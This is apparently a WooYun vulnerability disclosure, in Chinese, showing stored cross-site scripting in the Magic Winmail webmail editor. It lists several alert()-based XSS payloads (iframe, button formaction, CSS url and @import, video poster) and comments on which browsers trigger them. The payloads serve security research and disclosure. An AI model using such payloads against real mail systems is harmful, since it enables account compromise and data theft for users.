WooYun.org

官方演示站点：http://demo.magicwinmail.com:6080
然后发送邮件，到编辑器哪里，编辑然后提交内如如下：
<iframe src="javascript:alert(2)"><form><button formaction=javascript&colon;alert(1)>CLICKME
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<style>@import 'javascript:alert("XSS")';</style>
<style type="text/css">.holder{background-image:url("javascript:alert('XSS')");}</style>
<video poster=javascript:alert(1)//></video> // Opera 10.5以下有效
提交如图所示：

然后查看邮件如图所示：

这里的点击框是第一条所产生的，奇怪的是单独写
<form><button formaction=javascript&colon;alert(1)>CLICKME不会触发
连着写：
<iframe src="javascript:alert(2)"><form><button formaction=javascript&colon;alert(1)>CLICKME 就会触发第一条规则
后面的几条规则，我们打开ie看一下效果即可：

速度可能得等一会儿才能触发，
最后一个要去Opera 10.5以下有效，但是节点已经插入进去 完整的一个dom节点：
通过firebug查看节点如下：

ok这里就不测试了